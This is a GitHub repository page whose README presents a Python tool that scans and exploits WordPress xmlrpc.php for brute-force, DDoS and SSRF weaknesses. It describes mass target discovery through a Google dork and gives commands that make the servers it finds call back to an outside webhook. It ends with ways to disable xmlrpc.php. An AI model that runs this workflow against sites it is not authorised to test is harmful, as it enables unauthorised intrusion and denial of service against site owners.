Skip to content
/ xmlrpc-exploit Public

A powerful and automated XML-RPC vulnerability Scanner and Exploitation script written in Python. Designed to detect and test for multiple security risks in WordPress xmlrpc.php file

License

View license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

WhiteeRabbit/xmlrpc-exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 
xmlrpc.py
xmlrpc.py
 
 

Repository files navigation

🔍 XMLRPC Vulnerability Scanner

xmlrpc

❗ This tool is for educational and testing purposes only.

❗Do not use it on websites without permission.

📖 What is this?

This is a simple Python script that helps you find and test WordPress websites for security issues in the xmlrpc.php file.

This file is used by WordPress for remote communication, but sometimes it can be abused by hackers.

This tool helps you:

  • Find sites using xmlrpc.php
  • Clean and prepare the URLs
  • Check for vulnerabilities like Brute Force, DDoS, IP Disclosure and BLIND SSRF
  • Learn how to protect your site from these risks

🚀 How to Use This Tool

✅ Installing Requirements

Before running the script, make sure Python is installed on your system.

To do that you can run on terminal or cmd: python3 --version or python --version Once Python is ready, install the required Python libraries.

pip install -r requirements.txt

✅ Step 1: Find websites with xmlrpc.php

Before we check for any problems, we first need to find websites that have xmlrpc.php.

You can search on Google using dork. For example:

inurl:"/xmlrpc.php?rsd" & ext:php

This will show you many websites that look like this:

https://example.com/xmlrpc.php?rsd

💡 To make this easier, I made another program that does the hard work for you. It finds sites and saves them for you automatically:

👉 Download the Dork Seeker

🔁 Step 2: Clean the URLs

After you collect the list of websites from Step 1, you’ll notice that the links look like this: 
https://example.com/xmlrpc.php?rsd

But for our tests to work, the link must look like this:

https://example.com/xmlrpc.php

The problem is that ?rsd is added at the end — and we don’t need it. To solve this, we use my Python script called xmlrpc.py.

This script automatically removes `?rsd` from all the links.

So instead of fixing every URL by hand, the script does it for you — quickly and easily.

How to use this script:

usage: xmlrpc.py [-h] -l LIST [-f] [-s] [-b] [-d] [-e]
                 [-w WEBHOOK] [-x]

Tool to explore vulnerabilities in xmlrpc.php. The author takes no
responsibility for any misuse. Use at your own risk!

options:
  -h, --help            show this help message and exit
  -l LIST, --list LIST  Path to URL list file (e.g., filtered.txt)
  -f, --filter          Filter '?rsd' from URLs
  -s, --ssrf            Check if site supports SSRF via
                        'pingback.ping'
  -b, --brute_check     Check for XML-RPC brute-force capable
                        methods
  -d, --ddos_check      Check if site is vulnerable to XML-RPC
                        DDoS
  -e, --exploit         Exploit SSRF vulnerability (requires
                        --webhook)
  -w WEBHOOK, --webhook WEBHOOK
                        Webhook for SSRF exploit
  -x, --examples        Show usage examples and Contacts

Filter urls:

python3 xmlrpc.py --list results.txt --filter

✅ After running the script, you will get a new file called filtered.txt This file contains all the fixed URLs — the ?rsd part has been removed.

Now your list is clean and ready to use. You can start checking the sites for vulnerabilities like brute force, DDoS, Ip-disclosure and SSRF(Blind and full).

💣 Step 3: Test for VULNS

Now that your filtered.txt file is ready, you can begin testing the websites to see if they are vulnerable.

✅This tool lets you check for 3 common vulnerabilities in xmlrpc.php:

  • 🔐 Brute Force – This test checks if the website allows login attempts using a special method inside xmlrpc.php. If the site is vulnerable, it could make brute forcing much faster than brute forcing the normal wp-admin login page. A vulnerable site could be an easy target for BRUTE FORCE attacks.

  • 🌐 DDoS – This test checks if the site is at risk of this kind of attack. If the site doesn’t protect itself, it might slow down or crash.

  • 🕵️ SSRF (Server-Side Request Forgery) – This check tests for BLIND SSRF using xmlrpc.php. It sends a special request that makes the server try to contact your webhook URL. If you see a request in your webhook, it means the server is connecting to your URL — this shows the server can make outside requests. This is called Blind SSRF because the server does not send data back directly, but you can see its actions through your webhook. If the server allows you to send requests to internal addresses (e.g., 127.0.0.1) through xmlrpc.php and shows you the response, this becomes a full SSRF vulnerability If the server allows this, it might let attackers: Access private or internal services (like 127.0.0.1), Read secret files or data(LFI), Bypass security protections

⚔️ Check and exploit vulnerabilities

⚔ Check for SSRF: 

python3 xmlrpc.py -l filtered.txt --ssrf
Option Description
-l or --list Text file without ?rsd ending
-s or --ssrf Check for SSRF vuln via pingback.ping

💥 Exploit SSRF (requires webhook): 

python3 xmlrpc.py -l may_vulnerable.txt -e --webhook YOUR_WEBHOOK
Option Description
-l or --list Text file after checking SSRF
-e or --exploit Try to Exploit the vulnerability
-w or --webhook Webhook to catch the response from website: webhook.site or Using Burp Collaborator)

You need an Your unique DNS name option from https://webhook.site/

🛡️ Step 4: How to prevent xmlrpc attacks

To prevent xmlrpc attacks you should disable xmlrpc.php

There are three ways to disable xmlrpc.php:

  • 1) Installing a plugin to disable xmlrpc.php is the easiest way to do this. The Disable XML-RPC plugin will disable it completely.

  • 2) Disable xmlrpc.php via a Filter An option here is to use the xmlrpc_enabled filter to disable xmlrpc.php. Add this function to a plugin and activate it on your site:

add_filter( 'xmlrpc_enabled', '__return_false' );

You could add this to your theme functions file but it’s better practice to write a plugin.

  • 3) Disable xmlrpc.php via the .htacess File In your .htaccess file, add this code:*
<Files "xmlrpc.php">
  Require all denied
</Files>**
  • 4) Alternatively, some hosting providers will disable xmlrpc.php if an attack is detected. This will produce a 403 error and stop the attack in its tracks

📫 Contact

Made with ❤️ by WhiteeRabbit
Feel free to open an issue or contact me for suggestions!

📃 License:

LICENSE

🙏🏻 Big thanks to everyone who gave a ⭐️ to this project or helped in any way.

Your support means a lot and keeps this kind of work going!

About

A powerful and automated XML-RPC vulnerability Scanner and Exploitation script written in Python. Designed to detect and test for multiple security risks in WordPress xmlrpc.php file

Topics

exploit scanner python-script scan vulnerability scan-tool scanning python3-script vulnerability-detection xmlrpc web-scanner vulnerability-scanning vulnerability-scanner scanning-tool python-exploits python-scanner xmlrpc-injection xmlrpc-scanner xmlrpc-finder

Resources

Readme

License

View license
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages